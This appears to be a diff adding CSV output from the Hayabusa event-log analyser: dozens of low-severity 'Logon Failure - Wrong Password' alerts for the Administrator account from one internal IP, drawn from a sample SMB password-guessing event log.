+2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7clwftf7R0uNbqJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IsIyPcMAPnlxJa12 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CKcyo1Ec4rs3Z2g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZlzKvZLO8CDotkbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyRpYYtmD8389Yvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t3Pg0H9Gncoyr45m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zksaaJ7Z1wuy4PMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WdYAEdfWxLdM1rh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VyYFJRy0cxPfqDFh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv2Lz1h1bG6UatVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FLKPLfEe3PpEzRNc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJWv7ggzCSyEznOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZUtR9CNfKMHQMd7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6fYNHuRTqi15cRkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DvxZHwJwrBYXlEyv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jscJTJjhKvCtDl8q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZEIEjcimMyHWUsp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 30OdVRH9ZATLezsR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJ1OSBVZHKmyOzj8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JanG6Q0oYpTdm9mC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PWCwDYL3T7TAdb0J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRdyZaio1HjUKlNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VjiRnExy9TzZTG0R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztUyQpl8c9RoAr1j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jC23QAFM07q7cfVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TSM8lmdOFoDslQNa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sGZaUGAT1oXmnGLB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMNo21pTA67pb7Go | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiTZCqK3m4icL1Vi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZaZ2mnoihX1Ec4di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ihm9zaXkmWklXk4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yLIZ3tlw9VlQmK28 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GVHzJHTi55NbxXYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1FROeEnMLna2fTTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pio6ZZ9pV0pS2Whi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h1aD2w5U5K9ND5HV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zF8Jb4GpG4D3xn9i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edv4GwGfL156V1xe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Irvneva9RFn44iII | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dHtJFI8OL9kJylL5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F5Q4h62T77hGjhKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdSALwo9td9xUeBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1kYfoqz1r1NuEn04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7X400gufqdunUa8j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lLR8z7g0GY8r7a1r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHMztrxiKBGtNqkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eBQevVhmZs5gHFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lyQCs0PG6fGzpidu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnsPjnCieyoFIbJZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ku6mjVaG1lCJrAo1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VwiyVIWHOGuHzhdO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92v1rXcj5c0Lt3OF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yO2JYd6FfM2Y7px9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ltr5g8ZWUAdrPKxg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fjiPMy5uOTbbmaQ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HDRVOzxca9wDJziV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DV28RjUK26Je2Dr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seoetT43w0S3FEss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IdIU9Q9Ig4Bd3Aps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGzuHSHT59Qnp5jI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPA1J7aQrZ064WSf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhLFXDMUKGfdoc4S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: apVAhc6o3dhLmUll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYMdQeB4ZpFm8xDh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QewW1ISqRdXwtSXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SFhBcgZfc9VZ5S8S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a4ZSRW7F65yDNbJd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HrbzGNYIbjErVtDR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eFcGaL3asLVIF08d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dhJvIM5PzA9U6GTD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYrfD15TPp8OuST4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8d4CbZSTHhl7fRfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IItrtl1h3PsKviaQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVeoptuwLNKlm0V2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
